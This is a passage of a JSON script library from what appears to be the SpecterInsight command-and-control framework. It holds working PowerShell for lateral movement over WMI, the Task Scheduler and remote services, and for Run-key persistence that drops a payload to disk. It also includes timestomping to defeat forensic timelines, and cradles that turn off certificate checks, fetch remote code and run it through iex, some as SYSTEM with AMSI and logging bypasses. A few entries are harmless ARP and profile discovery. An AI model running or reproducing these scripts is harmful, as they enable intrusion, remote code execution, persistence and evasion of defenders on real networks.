    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\n#Generate a new PowerShell cradle command\r\n$Command = payload -Build $Build -Kind 'ps_command';\r\n\r\n#Execute command on remote system using WMI commandline executable\r\nif(![String]::IsNullOrEmpty($Username) -and $Password -ne $null) {\r\n    #Run with explicit credentials\r\n    $SecurePassword = ConvertTo-SecureString -String $Password -AsPlainText -Force\r\n    $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $SecurePassword\r\n\r\n    Invoke-WmiMethod -Class \"WIN32_PROCESS\" -Name \"Create\" -ArgumentList $Command -ComputerName $Target -Credential $Credential\r\n} else {\r\n    #Run with impersonation\r\n    Invoke-WmiMethod -Class \"WIN32_PROCESS\" -Name \"Create\" -ArgumentList $Command -ComputerName $Target\r\n}",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "command-and-scripting-interpreter",
      "execution",
      "lateral-movement",
      "powershell",
      "windows-management-instrumentation"
    ],
    "enabled": true
  },
  {
    "identifier": "d75a6baa98614c28bb4b79c96a5f88d9",
    "name": "Get Profile Image Paths",
    "description": "Lists each user profile directory on the system.",
    "documentation": "# Overview\r\n\r\nThis cmdlet lists each user profile directory on the system as defined in the registry.\r\n\r\n# Example Output\r\n\r\n```\r\nName                                           ProfilePath                              \r\n----                                           -----------                              \r\nS-1-5-18                                       C:\\Windows\\system32\\config\\systemprofile \r\nS-1-5-19                                       C:\\Windows\\ServiceProfiles\\LocalService  \r\nS-1-5-20                                       C:\\Windows\\ServiceProfiles\\NetworkService\r\nS-1-5-21-3175321519-4186628844-3469316858-1001 C:\\Users\\helpdesk    \r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n[\r\n  {\r\n    \"Name\": \"S-1-5-18\",\r\n    \"ProfilePath\": \"C:\\\\Windows\\\\system32\\\\config\\\\systemprofile\"\r\n  },\r\n  {\r\n    \"Name\": \"S-1-5-19\",\r\n    \"ProfilePath\": \"C:\\\\Windows\\\\ServiceProfiles\\\\LocalService\"\r\n  },\r\n  {\r\n    \"Name\": \"S-1-5-20\",\r\n    \"ProfilePath\": \"C:\\\\Windows\\\\ServiceProfiles\\\\NetworkService\"\r\n  },\r\n  {\r\n    \"Name\": \"S-1-5-21-3175321519-4186628844-3469316858-1001\",\r\n    \"ProfilePath\": \"C:\\\\Users\\\\helpdesk\"\r\n  }\r\n]\r\n```",
    "scriptBlock": "$keys = gci \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\"\r\nforeach($key in $keys) {\r\n    New-Object psobject -Property @{\r\n        Name = Split-Path -Path $key.Name -Leaf\r\n        ProfilePath = $key.GetValue('ProfileImagePath');\r\n    }\r\n}",
    "version": 1,
    "isPremium": true,
    "labels": [
      "account-discovery",
      "discovery",
      "host-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "3a29fd4e78194486a036e79cd7c8ecd8",
    "name": "Lateral Movement with Scheduled Tasks and PowerShell Cradle API",
    "description": "This script leverages the Tas Scheduler API, username, and password to remotely execute a Specter PowerShell cradle.",
    "documentation": "# Overview\r\n\r\nThis script leverages the Task Scheduler API to run a scheduled task on the operator specified system using username and password. A PowerShell cradle is executed as either the specified user or NT AUTHORITY\\SYSTEM. The $Hostname parameter can be either hostname, FQDN, or IP.\r\n\r\n# Dependencies\r\n\r\n- Lateral\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- Valid credentials for the target systems.\r\n- Scheduled Task service running on the target.",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The target hostname or IP address.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$System,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The user to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Username,\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"The domain the user belongs to or leave blank if it is a local user.\")]\r\n    [string]$Domain,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The password for the specified user account.\")]\r\n    [ValidateNotNull()]\r\n    [string]$Password,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"Run the task as the specified user or as NT AUTHORITY\\SYSTEM.\")]\r\n    [ValidateSet('User', 'System')]\r\n    [string]$Profile = \"System\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'CacheTask',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\nload lateral;\r\n\r\n$RunAsSystem = $Profile -eq 'System';\r\n\r\n#Get the URLs for the cradle generator\r\n$urls = (payload -Build $Build -Kind 'ps_url' | % { \"'$_'\" }) -Join \", \";\r\n$task = \"[Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}; `$urls = @($urls); foreach(`$url in `$urls) { try { `$a = (New-Object Net.WebClient).DownloadString(`$url); iex `$a; } catch { } }\";\r\n$base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($task));\r\n$arguments = \"-ExecutionPolicy Bypass -EncodedCommand `\"$base64`\"\";\r\nInvoke-ScheduledTask -System $System -Domain $Domain -Username $Username -Password $Password -TaskName $TaskName -Application 'powershell.exe' -Arguments $arguments -RunAsSystem:$RunAsSystem",
    "version": 4,
    "isPremium": true,
    "labels": [
      "api",
      "lateral-movement",
      "scheduled-task",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "24ef0cdbe1804b92b91c232487c4b47f",
    "name": "Persistence via Runkeys and Obfuscated Payload",
    "description": "Installs persistence by creating a registry key to run an obfuscated payload on startup or user logon.",
    "documentation": "# Overview\r\n\r\nInstalls persistence by creating a registry key to run an obfuscated payload on startup as the current user or NT AUTHORITY\\SYSTEM. This script requires a high integrity process for SYSTEM level persistence.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process for SYSTEM runkeys\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Persistence\": {\r\n      \"ValueName\": \"BitsBackgroundUpdate\",\r\n      \"Id\": \"e02cd16a798048629dee1cc6a6eb5f24\",\r\n      \"Profile\": \"User\",\r\n      \"Method\": \"Run Key\",\r\n      \"Command\": \"C:\\\\Users\\\\helpdesk\\\\AppData\\\\Local\\\\Temp\\\\SecureVaultApp\\\\SecureVaultApp.exe\",\r\n      \"Build\": \"6650a1c5680b402e8df45433a06c94a8\",\r\n      \"Success\": true,\r\n      \"RegistryKeyPath\": \"HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\r\n      \"Trigger\": \"OnLogon\",\r\n      \"UninstallScript\": \"try {\\r\\n\\tRemove-ItemProperty 'HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run' -Name 'BitsBackgroundUpdate' -Force;\\r\\n    $path = 'C:\\\\Users\\\\helpdesk\\\\AppData\\\\Local\\\\Temp\\\\SecureVaultApp\\\\SecureVaultApp.exe';\\r\\n    if(![System.IO.File]::Exists($path)) {\\r\\n        [System.IO.File]::Delete($path);\\r\\n    }\\r\\n\\t$success = $true;\\r\\n} catch {\\r\\n\\t$success = $false;\\r\\n\\tthrow;\\r\\n}\\r\\n\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"e02cd16a798048629dee1cc6a6eb5f24\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"Run Key\\\";\\r\\n\\t    Profile = \\\"User\\\";\\r\\n\\t    Trigger = \\\"OnLogon\\\";\\r\\n\\t}\\r\\n}\",\r\n      \"Event\": \"Create\"\r\n    },\r\n  }\r\n]\r\n```\r\n\r\n# Example Uninstall Script\r\n\r\nThis script generates an uninstall script that removes the persistence mechanism.\r\n\r\n```ps1\r\n\t\r\ntry {\r\n\tRemove-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'BitsBackgroundUpdate' -Force;\r\n    $path = 'C:\\Users\\helpdesk\\AppData\\Local\\Temp\\SecureVaultApp\\SecureVaultApp.exe';\r\n    if(![System.IO.File]::Exists($path)) {\r\n        [System.IO.File]::Delete($path);\r\n    }\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"e02cd16a798048629dee1cc6a6eb5f24\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Run Key\";\r\n\t    Profile = \"User\";\r\n\t    Trigger = \"OnLogon\";\r\n\t}\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the registry key entry.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Name = 'BitsBackgroundUpdate',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the environment variable to store the PowerShell payload.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$EnvironmentVariableName = 'BitsBackgroundParams',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The type of registry key persistence.\")]\r\n    [ValidateSet('CurrentUserRun', 'CurrentUserRunOnce', 'SystemRun', 'SystemRunOnce')]\r\n    [string]$RunKey = 'CurrentUserRun',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The type of payload to drop.\")]\r\n    [ValidateSet(\"csharp_load_module\", \"csharp_powershell_host\", \"ps_command\")]\r\n    [string]$Payload = \"csharp_load_module\"\r\n)\r\n\r\ntry {\r\n    #Generate a payload\r\n    if($Payload -eq 'ps_command') {\r\n        $command = payload -Build $Build -Kind $Payload;\r\n    } else {\r\n        $contents = payload -Build $Build -Kind $Payload;\r\n        $assembly = [System.Reflection.Assembly]::Load($contents);\r\n        $filename = $assembly.GetName();\r\n\r\n        #Drop the payload to disk\r\n        if($Profile -eq 'System') {\r\n            $path = \"C:\\Program Files\\$($filename.Name)\\$($filename.Name).exe\";\r\n        } else {\r\n            $tempfolder = [System.IO.Path]::GetTempPath();\r\n            $path = [System.IO.Path]::Combine($tempfolder, [System.IO.Path]::Combine($filename.Name, $filename.Name + \".exe\"));\r\n        }\r\n        $directory = [System.IO.Path]::GetDirectoryName($path);\r\n        if(![System.IO.Directory]::Exists($directory)) {\r\n            [void][System.IO.Directory]::CreateDirectory($directory);\r\n        }\r\n        [System.IO.File]::WriteAllBytes($path, $contents);\r\n        $command = $path;\r\n        $config = Get-CompatibilityConfig\r\n        [System.IO.File]::WriteAllText($path + \".config\", $config);\r\n    }\r\n\r\n\t$environment = \"Machine\";\r\n\t$Profile = \"System\";\r\n\t$Trigger = \"OnStartup\";\r\n\tif($RunKey -like \"*User*\") {\r\n\t\t$environment = \"User\";\r\n\t\t$Profile = \"User\";\r\n\t\t$Trigger = \"OnLogon\";\r\n\t}\r\n\t\r\n    $regpath = [string]::Empty;\r\n\tif($RunKey -eq \"CurrentUserRun\") {\r\n\t\t$regpath = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\n\t} elseif($RunKey -eq \"CurrentUserRunOnce\") {\r\n\t\t$regpath = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\r\n\t} elseif($RunKey -eq \"SystemRun\") {\r\n\t\t$regpath = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\n\t} elseif($RunKey -eq \"SystemRunOnce\") {\r\n\t\t$regpath = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\r\n\t}\r\n\tSet-ItemProperty $regpath -Name $Name -Value $Command -Force;\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n#Generate a persistence ID\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Run Key\";\r\n\t    Profile = $Profile;\r\n\t    Trigger = $Trigger;\r\n\t    ValueName = $Name;\r\n\t    RegistryKeyPath = $regpath;\r\n\t    Command = $command;\r\n\t    Build = $Build;\r\n\t    UninstallScript = @\"\r\ntry {\r\n\tRemove-ItemProperty '$regpath' -Name '$Name' -Force;\r\n    `$path = '$path';\r\n    if(![System.IO.File]::Exists(`$path)) {\r\n        [System.IO.File]::Delete(`$path);\r\n        [System.IO.File]::Delete(`$path + '.config');\r\n    }\r\n\t`$success = `$true;\r\n} catch {\r\n\t`$success = `$false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"Run Key\";\r\n\t    Profile = \"$Profile\";\r\n\t    Trigger = \"$Trigger\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 22,
    "isPremium": true,
    "labels": [
      "api",
      "boot-or-logon-autostart-execution",
      "event-triggered-execution",
      "modify-registry",
      "persistence",
      "registry-run-keys"
    ],
    "enabled": true
  },
  {
    "identifier": "0db3437fdff24882bd80dade2ceb5660",
    "name": "Run Specter PowerShell  Cradle as SYSTEM with Schtasks Commandline",
    "description": "This script generates a new obfuscated PowerShell cradle and runs it with a scheduled task as NT AUTHORITY\\SYSTEM.",
    "documentation": "# Overview\r\n\r\nThis script generates a new obfuscated PowerShell cradle containing both an AMSI bypass and a PowerShell logging bypass. It then runs schtasks.exe to create and run a scheduled task as NT AUTHORITY\\SYSTEM. The task is then deleted. The TaskName can be configured, but the default is \"CacheTask\".\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process\r\n\r\n# Example Output\r\n\r\n```\r\nSUCCESS: The scheduled task \"CacheTask\" has successfully been created.\r\nSUCCESS: Attempted to run the scheduled task \"CacheTask\".\r\nSUCCESS: The scheduled task \"CacheTask\" was successfully deleted.\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'CacheTask',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the environment variable tat will store the payload.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$EnvironmentVariableName = 'GPO_AUX',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\n$urls = (urls $Build | % { $_.Trim('/') } | % { \"'$_/static/$Build/downloads/1'\" }) -Join \", \";\r\n$task = \"[Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}; `$urls = @($urls); foreach(`$url in `$urls) { try { `$a = (New-Object Net.WebClient).DownloadString(`$url); iex `$a; } catch { } }\";\r\n[Environment]::SetEnvironmentVariable($EnvironmentVariableName, $task, \"Machine\")\r\nschtasks /CREATE /SC ONSTART /RU SYSTEM /TN $TaskName /TR \"powershell.exe -WindowStyle hidden -NonInt -ep bypass -nop -c \\`\"iex ([System.Environment]::GetEnvironmentVariable(\\\\\\`\"$EnvironmentVariableName\\\\\\`\", \\\\\\`\"Machine\\\\\\`\"))\\`\"\" /F | Out-Null;\r\nschtasks /RUN /TN $TaskName /I;\r\nStart-Sleep -Seconds 3;\r\nschtasks /DELETE /TN  $TaskName /F\r\n[Environment]::SetEnvironmentVariable($EnvironmentVariableName, $null, \"Machine\")",
    "version": 4,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "powershell",
      "privilege-escalation",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "9ff5955128fc4eaa86b0070080718301",
    "name": "Get ARP Entries",
    "description": "Identify IP and MAC addresses found in the ARP tables for each network interface.",
    "documentation": "# Overview\r\n\r\nThis script pulls Address Resolution Protocol (ARP) entries from the ARP tables maintained for each network interface that is in the \"Up\" state and is not a loopback interface. Multicast and static ARP entries are also not includes as these are typically not useful or are broadcast addresses.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Text Output\r\n\r\n```\r\nEntryType IP            MAC               Network\r\n--------- --            ---               -------\r\nDynamic   192.168.1.1   00-0C-29-3C-B5-CD 192.168.1.0/24\r\nDynamic   192.168.1.2   00-0C-29-24-31-7C 192.168.1.0/24\r\nDynamic   192.168.1.100 00-0C-29-47-AD-FD 192.168.1.0/24\r\nDynamic   10.0.0.1      B0-B9-8A-61-B0-E8 10.0.0.0/24\r\nDynamic   10.0.0.3      E6-85-ED-D7-DF-0C 10.0.0.0/24\r\nDynamic   10.0.0.5      A0-40-A0-6F-89-92 10.0.0.0/24\r\nDynamic   10.0.0.7      98-28-A6-BD-AF-9E 10.0.0.0/24\r\nDynamic   10.0.0.8      C8-3A-6B-1C-73-28 10.0.0.0/24\r\n```\r\n\r\n# Example Json Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"EntryType\": \"Dynamic\",\r\n    \"IP\": \"192.168.1.1\",\r\n    \"MAC\": \"00-0C-29-3C-B5-CD\",\r\n    \"Network\": \"192.168.1.0/24\",\r\n    \"Session\": {\r\n      \"MachineId\": \"dfec7175a6a62757d83b93794df767d5acfadb82\",\r\n      \"SessionId\": \"afbfc3c172a94df28fa498baa70dce77\",\r\n      \"FQDN\": \"DESKTOP-LMCH70V\",\r\n      \"IP\": \"::1\",\r\n      \"OS\": \"Windows 10.0.19044\",\r\n      \"Username\": \"DESKTOP-LMCH70V\\\\helpdesk\",\r\n      \"PID\": 1840,\r\n      \"Path\": \"C:\\\\Users\\\\helpdesk\\\\Desktop\\\\Workspace\\\\repos\\\\SpecterInsight\\\\src\\\\release\\\\implants\\\\1fe0b18153764e549b04928e79fc288f\\\\x64\\\\WinNativeExe.exe\"\r\n    },\r\n    \"@timestamp\": \"2023-08-02T12:53:19.2322849Z\",\r\n    \"Specter\": {\r\n      \"TaskId\": \"bce787c6de084d7ca91297617a624e62\",\r\n      \"Command\": \"load recon;\\r\\n\\r\\n$interfaces = interfaces;\\r\\n\\r\\n$multicast = [common.Networking.IPNetwork]::Parse('224.0.0.0/4');\\r\\n\\r\\nforeach($interface in $interfaces) {\\r\\n\\t#Network must be Up to scan\\r\\n\\tif($interface.Status -ne 'Up') {\\r\\n\\t\\tcontinue;\\r\\n\\t}\\r\\n\\t\\r\\n\\tif($interface.InterfaceType -eq 'Loopback') {\\r\\n\\t\\tcontinue;\\r\\n\\t}\\r\\n\\t\\r\\n\\t$networks = New-Object System.Collections.ArrayList\\r\\n\\tforeach($entry in $interface.InterfaceIPs) {\\r\\n\\t\\t$address = [System.Net.IPAddress]::Parse($entry.IP);\\r\\n\\t\\tif($address.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetworkV6 -or [common.Networking.IPNetwork]::Contains($multicast, $address) -or $address -eq [System.Net.IPAddress]::Broadcast) {\\r\\n\\t\\t\\tcontinue;\\r\\n\\t\\t}\\r\\n\\t\\t\\r\\n\\t\\t$network = $null;\\r\\n\\t\\tif(![common.Networking.IPNetwork]::TryParse($entry.IP, $entry.Netmask, [ref]$network)) {\\r\\n\\t\\t\\tcontinue;\\r\\n\\t\\t}\\r\\n\\t\\t\\r\\n\\t\\t[void]$networks.Add($network);\\r\\n\\t}\\r\\n\\t\\r\\n\\tforeach($entry in $interface.Entries) {\\r\\n\\t\\t$address = [System.Net.IPAddress]::Parse($entry.Address);\\r\\n\\t\\tif([common.Networking.IPNetwork]::Contains($multicast, $address) -or $address -eq [System.Net.IPAddress]::Broadcast -or $entry.EntryType -eq 'Static') {\\r\\n\\t\\t\\tcontinue;\\r\\n\\t\\t}\\r\\n\\t\\t\\r\\n\\t\\tforeach($network in $networks) {\\r\\n\\t\\t\\tif($network.Contains($address)) {\\r\\n\\t\\t\\t\\t$entry | Add-Member -MemberType NoteProperty -Name \\\"Network\\\" -Value ($network.ToString());\\r\\n\\t\\t\\t\\tbreak;\\r\\n\\t\\t\\t}\\r\\n\\t\\t}\\r\\n\\t\\t\\r\\n\\t\\t$entry = New-Object PSObject -Property @{\\r\\n\\t\\t\\tIP = $entry.Address;\\r\\n\\t\\t\\tMAC = $entry.PhysicalAddress;\\r\\n\\t\\t\\tNetwork = $entry.Network;\\r\\n\\t\\t\\tEntryType = $entry.EntryType;\\r\\n\\t\\t}\\r\\n\\t\\t\\r\\n\\t\\t$entry;\\r\\n\\t}\\r\\n}\",\r\n      \"Type\": \"Task\",\r\n      \"Category\": \"\",\r\n      \"Subcategory\": \"\"\r\n    }\r\n  }\r\n]\r\n```",
    "scriptBlock": "load recon;\r\n\r\n$interfaces = interfaces;\r\n\r\n$multicast = [common.Networking.IPNetwork]::Parse('224.0.0.0/4');\r\n\r\nforeach($interface in $interfaces) {\r\n\t#Network must be Up to scan\r\n\tif($interface.Status -ne 'Up') {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\tif($interface.InterfaceType -eq 'Loopback') {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\t$networks = New-Object System.Collections.ArrayList\r\n\tforeach($entry in $interface.InterfaceIPs) {\r\n\t\t$address = [System.Net.IPAddress]::Parse($entry.IP);\r\n\t\tif($address.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetworkV6 -or [common.Networking.IPNetwork]::Contains($multicast, $address) -or $address -eq [System.Net.IPAddress]::Broadcast) {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\t$network = $null;\r\n\t\tif(![common.Networking.IPNetwork]::TryParse($entry.IP, $entry.Netmask, [ref]$network)) {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\t[void]$networks.Add($network);\r\n\t}\r\n\t\r\n\tforeach($entry in $interface.Entries) {\r\n\t\t$address = [System.Net.IPAddress]::Parse($entry.Address);\r\n\t\tif([common.Networking.IPNetwork]::Contains($multicast, $address) -or $address -eq [System.Net.IPAddress]::Broadcast -or $entry.EntryType -eq 'Static') {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\tforeach($network in $networks) {\r\n\t\t\tif($network.Contains($address)) {\r\n\t\t\t\t$entry | Add-Member -MemberType NoteProperty -Name \"Network\" -Value ($network.ToString());\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\t$entry = New-Object PSObject -Property @{\r\n\t\t\tIP = $entry.Address;\r\n\t\t\tMAC = $entry.PhysicalAddress;\r\n\t\t\tNetwork = $entry.Network;\r\n\t\t\tEntryType = $entry.EntryType;\r\n\t\t}\r\n\t\t\r\n\t\t$entry;\r\n\t}\r\n}",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "network-discovery",
      "passive",
      "remote-system-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "9a66866d779849a89d3ea33a444600b1",
    "name": "Lateral Movement Using Service Control Manager and PowerShell Cradle (PSExec)",
    "description": "This script loads a SpecterInsight implant onto the remote system by creating and executing a service that runs a PowerShell command that reflectively loads a Specter.",
    "documentation": "# Overview\r\n\r\nThis script leverages the Service Control Manager API to create and execute a remote service on the operator specified system using impersonation or username and password. The service runs a PowerShell command that downloads and executes an obfuscated script to load a Specter. The service is run under the NT AUTHORITY\\SYSTEM account.\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Dependencies\r\n\r\n- common\r\n- lateral\r\n\r\n# Pre-Requisites\r\n\r\n- Valid credentials for the target systems.\r\n- Service Control Manager\r\n- Firewall permissions to establish RPC connections\r\n- Server Service\r\n- Administrative Shares enabled\r\n- Firewall permissions allowing SMB connections",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The name of the service to create on the remote system.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The name of the service to create on the remote system.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$ServiceName = \"SpecterSvc\"\r\n)\r\n\r\nload common;\r\nload lateral;\r\n\r\n#Generate a new PowerShell cradle command\r\n$cradle = payload -Build $Build -Kind 'ps_command';\r\n#$cradle = $cradle.Replace(\"\\\", \"\\\\\");\r\n#$cradle = $cradle.Replace('\"', '\\\"');\r\n$command = \"C:\\Windows\\System32\\cmd.exe /c $cradle\";\r\n\r\n#Copy the payload to the remote system\r\ntry {\r\n    if([string]::IsNullOrEmpty($Username)) {\r\n        #Create the service\r\n        Create-Service -ComputerName $Target -ServiceName $ServiceName -Path $command -NoStart:$false;\r\n    } else {\r\n        #Create the service\r\n        Create-Service -ComputerName $Target -ServiceName $ServiceName -Path $command -Username $Username -Password $Password -NoStart:$false;\r\n    }\r\n    $success = $true;\r\n} catch {\r\n    $success = $false;\r\n    throw;\r\n} finally {\r\n    Remove-Service -Name $ServiceName;\r\n}\r\n\r\nNew-Object psobject -Property @{\r\n    Lateral = New-Object psobject -Property @{\r\n        Method = \"System Sevice\";\r\n        ServiceName = $serviceName;\r\n        Payload = 'ps_cradle';\r\n        System = $Target;\r\n        Username = $Username;\r\n        Success = $success;\r\n    };\r\n};",
    "version": 8,
    "isPremium": true,
    "labels": [
      "api",
      "create-or-modify-system-process",
      "lateral-movement",
      "service-execution",
      "system-services",
      "valid-accounts",
      "windows",
      "windows-service",
      "powershell"
    ],
    "enabled": true
  },
  {
    "identifier": "65bb39e191ce4ac481a2bd43e279bed3",
    "name": "TimeStomp File or Folder",
    "description": "Change the timestamps for specific files or folders to a specific DateTime or mirror another file system entry.",
    "documentation": "# Overview\r\n\r\nThe timestomp command manipulates the timestamps of file system entries (both files and directories) so that defenders cannot easily leverage timeline analysis to detect malicious indicators of compromise.\r\n\r\n# Dependencies\r\n\r\n- Common\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Examples\r\n\r\n## Example 1: Basic Mirror\r\n\r\nThis example timestomps a single file. By default, the cmdlet will randomly select a random DLL from C:\\Windows\\System32\\ to mirror it's timestamp.\r\n\r\n```powershell\r\ntimestomp 'C:\\Windows\\Temp\\payload.exe'\r\n```\r\n\r\n## Example 1: Explicit Directory with Recursion\r\n\r\nThe -TimeStamp parameter allows the operator to specify an explicit DateTime value. In this case, a folder is being timestomped. The -Recurse parameter will timestomp the target file system entry and any files and directories underneath that directory. The -Recurse parameter is ignored if the argument is a file.\r\n\r\n```powershell\r\ntimestomp 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\foo\\' -TimeStamp '21 October 2023 8:37 AM' -Recurse\r\n```",
